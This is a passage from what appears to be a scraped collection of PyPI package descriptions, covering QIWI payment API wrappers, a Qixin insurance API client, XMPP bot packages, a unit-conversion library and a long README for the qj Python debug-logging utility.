\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f)(* - \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e)await client.get_current() - \u0432\u043e\u0437\u0430\u0440\u0432\u0449\u0430\u0435\u0442 UserInfoauth_info_enabled: bool = True- (\u041b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u0437\u043d\u0430\u043a \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438),contract_info_enabled: bool = True- (\u041b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u0437\u043d\u0430\u043a \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u0432\u0430\u0448\u0435\u043c QIWI \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0435),user_info_enabled: bool = True- (\u041b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u0437\u043d\u0430\u043a \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.)"} +{"package": "qiwimaster", "pacakge-description": "No description available on PyPI."} +{"package": "qiwi-payments", "pacakge-description": "No description available on PyPI."} +{"package": "qiwipy", "pacakge-description": "======pyQiwi======Python Qiwi API Wrapper* \u041b\u0438\u0446\u0435\u043d\u0437\u0438\u044f: MIT* \u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f: https://pyqiwi.readthedocs.io.\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438-----------* \u041e\u043f\u043b\u0430\u0442\u0430 \u043b\u044e\u0431\u044b\u0445 \u0443\u0441\u043b\u0443\u0433* \u041f\u0435\u0440\u0435\u0432\u043e\u0434\u044b \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 Qiwi \u041a\u043e\u0448\u0435\u043b\u0435\u043a* \u0421\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u043f\u043e \u043f\u043b\u0430\u0442\u0435\u0436\u0430\u043c* \u0418\u0441\u0442\u043e\u0440\u0438\u044f \u043e \u0441\u0434\u0435\u043b\u0430\u043d\u043d\u044b\u0445 \u043f\u043b\u0430\u0442\u0435\u0436\u0430\u0445 \u0432 \u043b\u044e\u0431\u043e\u0439 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u043a \u0432\u0440\u0435\u043c\u0435\u043d\u0438* \u041f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0443\u043f\u0440\u043e\u0449\u0435\u043d\u043d\u043e\u0439 
\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438* \u041e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430---------$ pip install qiwipy\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435---------import pyqiwiwallet = pyqiwi.Wallet(token='', number='79001234567')\u0411\u044b\u0441\u0442\u0440\u044b\u0439 \u0442\u0443\u0442\u043e\u0440\u0438\u0430\u043b----------------\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u0431\u0430\u043b\u0430\u043d\u0441~~~~~~~~~~~~~~~~~~~~~~~print(wallet.balance())\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u043f\u043b\u0430\u0442\u0435\u0436\u0430~~~~~~~~~~~~~~~~payment = wallet.send(pid=99, recipient='79001234567', amount=1.11, comment='\u041f\u0440\u0438\u0432\u0435\u0442!')example = 'Payment is {0}\\nRecipient: {1}\\nPayment Sum: {2}'.format(payment.transaction['state']['code'], payment.fields['account'], payment.sum)print(example)\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043c\u0438\u0441\u0441\u0438\u044e \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0435\u0436\u0430~~~~~~~~~~~~~~~~~~~~~~~~~~~~~commission = wallet.commission(pid=99, recipient='79001234567', amount=1.11)print(commission.qw_commission.amount)\u0414\u043b\u044f \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439, \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044e.=================\u0418\u0441\u0442\u043e\u0440\u0438\u044f \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439=================2.1 (6.05.2018)---------------* `Wallet.balance` \u0442\u0435\u043f\u0435\u0440\u044c \u0438\u043c\u0435\u0435\u0442 \u0431\u0430\u0437\u043e\u0432\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 `currency` 643 (\u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0439 \u0440\u0443\u0431\u043b\u044c)* \u041d\u043e\u0432\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u043e\u0432: `Wallet.identification`* \u0412\u0435\u0441\u044c \u0431\u043b\u043e\u043a \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u043a \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439 \u0431\u044b\u043b \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d \u0434\u043e API v2* \u0414\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043a\u0432\u0438\u0442\u0430\u043d\u0446\u0438\u0438 \u043f\u043e \u043f\u043b\u0430\u0442\u0435\u0436\u0443 \u0431\u044b\u043b \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d \u043c\u0435\u0442\u043e\u0434 `Wallet.cheque`* \u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u043f\u043e \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043f\u0440\u0438\u0447\u0438\u043d\u0435 \u043d\u0435\u0442 \"\u0431\u0430\u043b\u0430\u043d\u0441\u043e\u0432\" \u043d\u0430 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0435, \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0438\u0445 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 
`Wallet.create_account`\u0417\u0430\u043f\u0440\u043e\u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0441\u0447\u0435\u0442\u043e\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d \u0432 `Wallet.offered_accounts`* \u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u0441\u044b\u043b\u043a\u0438 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u044b\u0445 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u044b\u0445 \u0444\u043e\u0440\u043c \u0434\u043e\u0441\u0442\u0443\u043d\u043e \u0432 `pyqiwi.generate_form_link`* \u0412\u044b \u0445\u043e\u0442\u0438\u0442\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c ID \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u0434\u043b\u044f \u043f\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430? \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 `pyqiwi.detect_mobile`2.0.8 (29.04.2018)------------------* \u0423 \u043d\u0430\u0441 \u043f\u043e\u044f\u0432\u0438\u043b\u0438\u0441\u044c \u0442\u0435\u0441\u0442\u044b!* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.7 (14.04.2018)------------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.6 (9.03.2018)-----------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.5 (6.11.2017)-----------------* \u041b\u043e\u0433\u0433\u0435\u0440 \u0431\u044b\u043b \u043f\u0435\u0440\u0435\u043d\u0435\u0441\u0435\u043d \u0438\u0437 `pyqiwi.logger` \u0432 `pyqiwi.apihelper.logger`* \u041f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043c\u0435\u0442\u043e\u0434 \u0432 `Wallet` `transaction` \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0438 \u043f\u043e ID \u0438 \u0435\u0451 \u0442\u0438\u043f\u0443.* \u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u044d\u0442\u0438\u043c \u0438 \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0434\u043b\u044f \u043d\u0435\u0433\u043e \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u0442\u0438\u043f: `pyqiwi.types.Transaction`* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.4 (6.11.2017)-----------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.3 (6.11.2017)-----------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.2 (29.10.2017)------------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.1 (29.10.2017)------------------* \u0423 \u043d\u0430\u0441 
We now have documentation on ReadTheDocs!* The in-code documentation was substantially expanded* The appearance of the in-code documentation was changed2.0 (28.10.2017)----------------The first big change to the library!* Interested in logs? There is now a `pyqiwi` logger in `pyqiwi.logger`* Want to look at your Qiwi accounts? `Wallet.accounts`* Calls now return objects from `pyqiwi/types.py` rather than plain `dict` objects* All API calls were moved into `pyqiwi/apihelper.py`* If an API request produces an error, you get an exception from `pyqiwi/exceptions.py`1.2.1 (24.10.2017)------------------* Release on PyPI.1.2 (24.10.2017)----------------* The `Person` class was renamed to `Wallet`* The `Payment` class methods are now on `Wallet`* The `Payment` class was removed* No config is needed any more; the token is now passed to `Wallet()` [multi-account support]* Accordingly, a token has to be passed to `get_commission` (the same function also exists on `Wallet` with the token already prepared)* \u041c\u0435\u0442\u043e\u0434\u044b `Wallet.history()` \u0438 `Wallet.stat()` 
\u0442\u0440\u0435\u0431\u0443\u044e\u0442 `datetime.datetime`, \u0432\u043c\u0435\u0441\u0442\u043e `str`* \u041b\u044e\u0431\u044b\u0435 \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043a f-\u0441\u0442\u0440\u043e\u043a\u0430\u043c, \u0431\u044b\u043b\u0438 \u0437\u0430\u043c\u0435\u043d\u0435\u043d\u044b \u043d\u0430 \u043c\u0435\u0442\u043e\u0434 `str.format`1.1 (5.09.2017)---------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0443\u043b\u0443\u0447\u0448\u0435\u043d\u0438\u044f1.0 (5.09.2017)---------------* \u041f\u0435\u0440\u0432\u044b\u0439 \u0440\u0435\u043b\u0438\u0437!"} +{"package": "qiwipyapi", "pacakge-description": "No description available on PyPI."} +{"package": "qixinApi", "pacakge-description": "\u9f50\u6b23\u4e91\u670d API\u64cd\u4f5c\u65b9\u6cd5\u8d26\u6237\u5217\u8868\u67e5\u8be2.get_partner_info_list()\u8ba2\u5355\u8be6\u60c5.get_order(insure_num)\u6295\u4fdd\u5355\u5217\u8868.list_order()\u67e5\u8be2\u6628\u65e5\u6295\u4fdd\u5355.list_yesterday_order()fromqixinApi.qixinApiimportQxSdkpId=''sKey=''client=QxSdk(partner_id=pId,secret_key=sKey)# client = QxSdk(partner_id=pId, secret_key=sKey, env_type='test')try:foriteminclient.list_order(page_index=1,page_size=1)['orders']['data']:detail=client.get_order(item['insureNum'])print(detail['orderDetail']['applicant']['cName'])print(detail['orderDetail']['productName'])finally:client.close()"} +{"package": "qixingjiang", "pacakge-description": "No description available on PyPI."} +{"package": "qi.xmpp.admin", "pacakge-description": "Introductionqi.xmpp.admin is a special administrative bot used by qi.xmpp.botfarm that can add/delete/list users in your jabber server by implementing the XEP-0133 protocol.Changelog0.1 - UnreleasedInitial release"} +{"package": "qi.xmpp.botfarm", "pacakge-description": "Introduction============qi.xmpp.botfarm is a twisted based server that provides xmlrpc services to manage a collection of jabber-based helpdesks. It is currently used at chatblox.com_... _chatblox.com: http://chatblox.comInstallation============Installing with buildout------------------------If you are using `buildout`_ to manage your instance installing qi.xmpp.botfarm is very simple. You can install it by adding a new section, botfarm and include it in the parts section::[botfarm]recipe = zc.recipe.eggeggs = qi.xmpp.botfarmqi.xmpp.clientqi.xmpp.adminA link will be created in the bin directory pointing to the botfarm executable... _buildout: http://pypi.python.org/pypi/zc.buildoutInstalling without buildout---------------------------You can install qi.xmpp.botfarm easily using the easy_install command from setuptools. This will also install dependencies.Usage=====botfarm is called with the path to an xml configuration file as an argument. Copy config.xml in the docs folder and customize to your needs.Changelog=========0.1 - Unreleased----------------* Initial release"} +{"package": "qi.xmpp.client", "pacakge-description": "Introductionqi.xmpp.client is a simple xmpp (jabber) bot written on the twisted framework. By itself it does almost nothing but provides a good base on which to create your own bot by simply overriding the functions you want to support. The following xmpp extensions are supported:XEP-0030, Service discoveryXEP 0153 and XEP-0054, VCardsXEP-0095 and XEP-0065, file transfers through SOCKS5XEP-0092, Software versionXEP-0199, PingsChangelog0.1 - UnreleasedInitial release"} +{"package": "qixnat", "pacakge-description": "qixnat provides a XNAT facade and helper functions. 
See thedocumentationfor more information."} +{"package": "qiyas", "pacakge-description": "qiasqias is lightweight easy-to-use non-opinionated unit conversion Python library for scientists and engineers. It is based on graph theory and allows easy customization and addition of new units via script. Each unit need to be only defined by one existing unit. qias is smart enough to figure out the rest.Important noteThis is a very early release to proove the concept. Everything is working as expected and there are no issues. conversion tables need to be added. Currently, there are some units for length, mass, and volume for testing.PhilosophyLightweight: it only relies on thenetworkxpackage to handle graph operations andvarnameto identify variable names.Easy-to-use: customize it easily with new units.non-opinionated: It does not assume anything about your data. It does not create new data type. You can pass numpy array (or datatype that can be multiplied by a number) to it without issue.InstallationInstall it in your environment by running the commandpip install qiyasGetting startedfromqiyasimportqs# Typical usex=10x_cm=qs.convert(x,'m','cm')# Immediate use (Python 3.8+)x_m=10x_cm=qs.to(x_m,'cm')# Get multiplier informationmultiplier_info=qs.get_multiplier('m','cm')ContributionContributions are welcome, especially for unit tables. Create an issue first to discuss architectural change.MIT LicenseCopyright (c) 2021 Mustafa Al IbrahimPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qiye-game1", "pacakge-description": "No description available on PyPI."} +{"package": "qiye-weixin-api", "pacakge-description": "No description available on PyPI."} +{"package": "qiyi-utils", "pacakge-description": "UNKNOWN"} +{"package": "qiyu-api", "pacakge-description": "QiYu-API\u5947\u9047\u79d1\u6280 Python API \u96c6\u5408\u5f53\u524d\u5df2\u7ecf\u5408\u5e76ali_sms_api (\u963f\u91cc\u4e91\u77ed\u4fe1)apns_sdk_py (Apple APNs \u63a8\u9001)dtk_api (\u5927\u6dd8\u5ba2\u63a5\u53e3)mob_api (\u638c\u6dd8\u79d1\u6280\u63a5\u53e3)py_apple_signin (Apple Sign in \u63a5\u53e3)tbk_api (\u6dd8\u5b9d\u5ba2\u6807\u51c6\u5316\u7684\u7c7b\u578b)ztk_api (\u6298\u6dd8\u5ba2\u63a5\u53e3)"} +{"package": "qiyu-sso", "pacakge-description": "QiYu SSO Client\u63d0\u793a\u5f53\u524d\u4ec5\u4ec5\u662f\u5185\u90e8\u4f7f\u7528\u5b98\u7f51:https://user.qiyutech.tech/"} +{"package": "qj", "pacakge-description": "qjlogging designed for debugging(pronounced \u2018queuedj\u2019 /kju\u02d0\u02a4/)An easy-to-use but very expressive logging function.If you have ever found yourself rewriting a list comprehension as a for loop, or\nsplitting a line of code into three lines just to store and log an intermediate\nvalue, then this log function is for you.Overview:qj is meant to help debug python quickly with lightweight log messages that are\neasy to add and remove.On top of the basic logging functionality, qj also provides a collection of\ndebugging helpers that are simple to use, including the ability to drop into\nthe python debugger in the middle of a line of code.Examples:Instead of turning this:result = some_function(another_function(my_value))into this:tmp = another_function(my_value)\nlogging.info('tmp = %r', tmp)\nresult = some_function(tmp)you can just do this:result = some_function(qj(another_function(my_value)))Instead of turning this:my_list = [process_value(value)\n for value in some_function(various, other, args)\n if some_condition(value)]into this:my_list = []\nfor value in some_function(various, other, args):\n logging.info('value = %r', value)\n condition = some_condition(value)\n logging.info('condition = %r', condition)\n if condition:\n final_value = process_value(value)\n logging.info('final_value = %r', final_value)\n my_list.append(final_value)\nlogging.info('my_list = %r', my_list)you can keep it as the list comprehension:my_list = qj([qj(process_value(qj(value)))\n for value in some_function(various, other, args)\n if qj(some_condition(value))])Philosophy:There are two reasons we add logs to our code:We want to communicate something to the user of the code.We want to debug.In python, as well as most other languages, the default logging mechanisms\nserve the first purpose well, but make things unnecessarily difficult for the\nsecond purpose.Debug logging should have no friction.When you have of a question about your code, you should not be tempted to just\nthink hard to try to come up with the answer. Instead, you should know that\nyou can type just a few characters to see the answer.You should never have to rewrite code just to check it for bugs.The most important feature of a debug logger is that it always returns its\nargument. 
This allows you to add logging calls pretty much anywhere in your\ncode without having to rewrite your code or create temporary variables.This is a minimal implementation of qj:def qj(x):\n print(x)\n return xOnce you have that core property, there are a lot of other useful things you find\nyourself wanting that make debugging easier. qj attempts to cleanly pull\ndebugging-related features together into a very simple power-user interface.\nTo that end, most argument names are single letters that are mnemonics for the\nparticular feature:xis for the input that you want to log and return.sis for the string you want to describex.dis for the debugger.bis for the boolean that turns everything off.lis for the lambda that lets you log more things.pis for printing public properties ofx.nis for numpy array statistics.tis for printing tensorflow Tensors.ris for overriding the return value.zis for zeroing out the log count and automatic indentation of a particular log.A few less-commonly needed features get longer names:padis for padding a log message so that it stands out.tfcis for checking numerics on tensorflow Tensors.ticandtocare for measuring and logging timing of arbitrary chunks of code.timeis for measuring and logging timing stats for a callable.catchis for catching exceptions from a callable.log_all_callsis for wrappingxsuch that all public method calls and\ntheir return values get logged.The right description ofxis usually its source code.If you want to log the value of a variable namedlong_variable_name, you shouldn't\nneed to think about how to describe the variable in the log message so you can find it.\nIts name and the line number where you are logging it are its best description.qj(long_variable_name)logs something like this:qj: some_func: long_variable_name : Similarly, logging the value of a complicated expression should use the expression\nitself as the description.qj(foo * 2 + bar ** 2)logs something like:qj: some_func: foo * 2 + bar ** 2 : 42Note that this feature may not always work. If qj can't figure out the correct source code,\nit falls back to just logging the class (e.g.,qj: some_func: : 42).\nYou can always disable this just by passing the second argument to qj:qj(foo * 2 + bar ** 2, 'foo out').You shouldn't need toimportjust to log debug messages.Ideally, something like qj would be available as a builtin in python. We can get pretty\nclose to that ideal by providing a way to install qj into the global namespace after\nimporting it the first time. This means that you can pretend qj is a builtin and use it\nin any python code that runs after you import it once, even if the original import is in\nsome other file, package, or library.Adding logs should be easy. So should removing logs.The name qj is meant to be easy to type (two characters in opposite hands) and\neasy to search for and highlight in your code. 'qj' is one of the least\nfrequently occurring bigrams based on a survey of millions of lines of python\ncode, so it is hopefully very unlikely to occur naturally in your code. This\nproperty will help you find and remove all of your debug logs easily once you\nhave fixed your bugs.Logs should be easy to read.qj defaults to using colors. The metadata and description of the log are in red.\nThe value of the log is in green. 
Your debug logs will stand out strongly against\nwhatever normal logging your code does.qj also works to align log messages nicely, where possible, to help you visually\ngroup related log messages together.Basic Usage:Install with pip:$ pip install qjAdd the following import:from qj_global import qjThis makes qj globally available in any python code that is run after the\nimport. It's often nice to import qj from your main script once, since you\ncan then use it in your entire project (and even in other python libraries).\nSeeGlobal Accessfor more information on importing.If your problem code looks like this:def problem_code(...):\n ...\n problem_array = [other_func(value, other_args)\n for value in compute_some_array(more_args)\n if some_tricky_condition]Make it look like this:def problem_code(...):\n ...\n problem_array = qj([qj(other_func(qj(value), qj(other_args)))\n for value in qj(compute_some_array(qj(more_args)))\n if qj(some_tricky_condition)])In most cases, you shouldn't need to put logs on everything like that, of\ncourse. If your debug cycle is fast, you can add the logs more selectively to\navoid getting overwhelmed by new logspam.These changes will result in detailed logs that tell you what function they\nare running in, what line number they are on, what source code for the log is,\nand what its value is.The log messages will also be indented some amount that corresponds to how\nmany calls to qj are in the current code context. This is particularly\nuseful with comprehensions, since python reports the last line of the\ncomprehension in logs and stack traces, which is often not the correct line\nwhen dealing with long comprehensions (or even long argument lists).This is the general layout of the basic log message:[datetime] qj: function: [indentation] source code or description : valueIn the example above, the log messages might look like:qj: problem_code: more_args <92>: ['list', 'of', 'more_args']\nqj: problem_code: compute_some_array(qj(more_args)) <92>: ['list', 'of', 'things', 'hey!']\nqj: problem_code: some_tricky_condition <92>: True\nqj: problem_code: other_args <92>: ['list', 'of', 'other_args']\nqj: problem_code: value <92>: list\nqj: problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return list\nqj: problem_code: some_tricky_condition <92>: True\nqj: problem_code: other_args <92>: ['list', 'of', 'other_args']\nqj: problem_code: value <92>: of\nqj: problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return of\nqj: problem_code: some_tricky_condition <92>: False\nqj: problem_code: some_tricky_condition <92>: True\nqj: problem_code: other_args <92>: ['list', 'of', 'other_args']\nqj: problem_code: value <92>: hey!\nqj: problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return hey!\nqj: problem_code: [qj(other_func(qj(value), qj(other_args))) ...] 
<92>: ['other_func_return list', 'other_func_return of', 'other_func_return hey!']Things to note in that output:The indentation automatically gives a visual indicator of how the\ncomprehension is being computed -- you can see how the loops happen and\nwhen an iteration gets skipped at a glance or so (e.g., the two lines with\nthe same indention should jump out, and closer inspection shows that the\nif statement generated the False, which explains why the\nprevious indentation pattern didn't repeat).You didn't have to specify any logging strings -- qj extracted the source code from the call site.You can change the description string withqj(foo, 'this particular foo'):qj: some_func: this particular foo <149>: fooIf qj can't find the correct source code, it will log the type of the output instead.\nIf that happens, or if you don't want to see the line of code, you might change the\nprevious logging to look like this:def problem_code(...):\n ...\n problem_array = qj([qj(other_func(qj(value), qj(other_args)), 'other_func return')\n for value in qj(s='computed array', x=compute_some_array(qj(more_args)))\n if qj(s='if', x=some_tricky_condition)], 'problem_array')\n\nqj: problem_code: more_args <153>: ['list', 'of', 'more_args']\nqj: problem_code: computed array <153>: ['list', 'of', 'things', 'hey!']\nqj: problem_code: if <153>: True\nqj: problem_code: other_args <153>: ['list', 'of', 'other_args']\nqj: problem_code: value <153>: list\nqj: problem_code: other_func return <153>: other_func_return list\nqj: problem_code: if <153>: True\nqj: problem_code: other_args <153>: ['list', 'of', 'other_args']\nqj: problem_code: value <153>: of\nqj: problem_code: other_func return <153>: other_func_return of\nqj: problem_code: if <153>: False\nqj: problem_code: if <153>: True\nqj: problem_code: other_args <153>: ['list', 'of', 'other_args']\nqj: problem_code: value <153>: hey!\nqj: problem_code: other_func return <153>: other_func_return hey!\nqj: problem_code: problem_array <153>: ['other_func_return list', 'other_func_return of', 'other_func_return hey!']Note that both positional argumentsqj(value, 'val')and keyword argumentsqj(s='val', x=value)can be used.Advanced Usage:These are ordered by the likelihood that you will want to use them.You can enter the debugger withqj(d=1):This drops you into the debugger -- it even works in jupyter notebooks!You can use this to drop into the debugger in the middle of executing a comprehension:[qj(d=(value=='foo'), x=value) for value in ['foo', 'bar']]\n\nqj: some_func: d=(value=='foo'), x=value <198>: foo\n> (198)some_func()\n----> 198 [qj(d=(value=='foo'), x=value) for value in ['foo', 'bar']]\n\nipdb> value\n'foo'You can selectively turn logging off withqj(foo, b=0):This can be useful if you only care about logging when a particular value shows up:[qj(b=('f' in value), x=value) for value in ['foo', 'bar']]\n\nqj: some_func: b=('f' in value), x=value <208>: fooNote the lack of a log for 'bar'.If logging is disabled for any reason, the other argument-based features will not trigger either:qj(foo, d=1, b=(foo == 'foo'))This will only drop into the debugger iffoo == 'foo'.Logging can be disabled for three reasons:b=False, as described above.qj.LOG = False(seeParametersbelow).You are attempting to print more thanqj.MAX_FRAME_LOGSin the current\nstack frame (seeParametersbelow).You can log extra context withqj(foo, l=lambda _: other_vars):This is useful for logging other variables in the same context:[qj(foo, l=lambda _: other_comp_var) for foo, other_comp_var in 
...]\n\nqj: some_func: foo, l=lambda _: other_comp_var <328>: foo\nqj: some_func: ['other', 'comprehension', 'var']\nqj: some_func: foo, l=lambda _: other_comp_var <328>: bar\nqj: some_func: ['other', 'comprehension', 'var']The input (x) is passed as the argument to the lambda:qj(foo, l=lambda x: x.replace('f', 'z'))\n\nqj: some_func: foo, l=lambda x: x.replace('f', 'z') <336>: foo\nqj: some_func: zooNote that qj attempts to nicely align the starts of log messages that are all generated from the same call to qj.You can log the timing of arbitrary code chunks withqj(tic=1) ... qj(toc=1):qj(tic=1)\ndo_a_bunch()\nof_things()\nqj(toc=1)\n\nqj: some_func: tic=1 <347>: Adding tic.\nqj: some_func: toc=1 <350>: Computing toc.\nqj: 2.3101 seconds since tic=1.You can nestticandtoc:qj(tic=1)\ndo_something()\nqj(tic=2)\ndo_something_else()\nqj(toc=1)\nfinish_up()\nqj(toc=1)\n\nqj: some_func: tic=1 <348>: Adding tic.\nqj: some_func: tic=2 <350>: Adding tic.\nqj: some_func: toc=1 <352>: Computing toc.\nqj: 0.5200 seconds since tic=2.\nqj: some_func: toc=1 <354>: Computing toc.\nqj: 1.3830 seconds since tic=1.Since anyTruevalue will turn ontic, you can use it as a convenient identifier, as above wheretic=2is the second tic. The actual identifier printed bytocis whatever description string was\nused for thetic, though, so you can give descriptive names just as in any other log message:qj(foo, 'start foo', tic=1)\nfoo.start()\nqj(foo.finish(), toc=1)\n\nqj: some_func: start foo <367>: \nqj: Added tic.\nqj: some_func: foo.finish(), toc=1 <369>: Foo.SUCCESSFUL_FINISH\nqj: 5.9294 seconds since start foo.You can useticandtocin the same call to log the duration of any looping code:[qj(x, tic=1, toc=1) for x in [1, 2, 3]]\n\nqj: some_func: x, tic=1, toc=1 <380>: 1\nqj: Added tic.\nqj: some_func: x, tic=1, toc=1 <380>: 2\nqj: 0.0028 seconds since x, tic=1, toc=1.\nqj: Added tic.\nqj: some_func: x, tic=1, toc=1 <380>: 3\nqj: 0.0028 seconds since x, tic=1, 